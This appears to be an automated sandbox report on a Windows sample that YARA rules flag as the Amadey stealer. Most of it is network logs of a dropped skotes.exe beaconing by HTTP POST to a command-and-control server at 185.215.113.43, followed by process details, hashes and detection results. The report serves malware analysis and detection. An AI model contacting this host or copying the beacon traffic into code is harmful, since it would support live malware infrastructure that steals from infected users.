                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                Nov 24, 2024 02:23:10.278426886 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49869        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:12.027440071 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:13.404376984 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49875        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:15.027318954 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:16.419018984 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49886        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:18.170521975 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:19.548300028 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49892        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:21.183948994 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:22.519133091 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49900        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:24.261709929 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:25.604116917 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49910        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:27.240940094 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:28.664896965 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.6  49916        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:30.421768904 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:31.798350096 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.6  49923        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:33.433871031 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:34.773086071 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.6  49933        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:36.511797905 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:37.900830030 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.6  49939        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:39.528475046 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:40.908083916 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.6  49947        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:42.654645920 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:44.030520916 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.6  49956        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:45.652378082 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:46.997339964 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.6  49962        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:48.746124029 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:50.132993937 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.6  49972        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:51.763736963 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:53.163110971 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.6  49980        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:54.902472019 CET  156                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Nov 24, 2024 02:23:56.278815985 CET  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.6  49986        185.215.113.43  80                5588  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 02:23:57.949256897 CET  314                OUT        POST /Zu7JuNko/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.43
    Content-Length: 160
    Cache-Control: no-cache
    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 24, 2024 02:23:59.331363916 CET  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 24 Nov 2024 01:23:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.6 | 49996 | 185.215.113.43 | 80 | 5588 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 24, 2024 02:24:01.092000961 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:24:02.479404926 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:24:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0



                                                Target ID:0
                                                Start time:20:21:55
                                                Start date:23/11/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xb40000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2193715965.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2153521892.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:20:21:59
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 55%, ReversingLabs
                                                • Detection: 54%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:20:22:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:20:23:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Imagebase:0xd60000
                                                File size:1'884'672 bytes
                                                MD5 hash:6D76634E0D5A3748DBB40ED91D91480A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2797199366.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a9370cd4e3f36150e499fa0a1f057589f2347d778531eb06b792ba25b5063a8
                                                  • Instruction ID: 4fc745828c56d9584ff8c5bbe1c7ffb88ffc1242b2367db676f074093ac27f1e
                                                  • Opcode Fuzzy Hash: 5a9370cd4e3f36150e499fa0a1f057589f2347d778531eb06b792ba25b5063a8
                                                  • Instruction Fuzzy Hash: A0318DEB10C131BE760AC5C12B5CAFA67EEE0C6730330882BF447D9C82E2D95E5A5572
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 861db35f0abc8784556aba60be40dc91e1c556b8b1b59ea13ccde26b6e1d50ae
                                                  • Instruction ID: 362d39a0c692f1fd087b77d1dbb63dee48becb6f12cc3a9694910baa9837a18e
                                                  • Opcode Fuzzy Hash: 861db35f0abc8784556aba60be40dc91e1c556b8b1b59ea13ccde26b6e1d50ae
                                                  • Instruction Fuzzy Hash: 92215CEB10C135BE7246C5C12B19EFA66AEE5C67303318827F802D5C82E3C84E6E5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87ffe7fccdb2454fa26fa45983aabd46f549ad815a22559f20aab903429f2ab1
                                                  • Instruction ID: 797a3feb072b83258a490cfe638114e4c6cbfae4c3d0fc9fc35392cf86833026
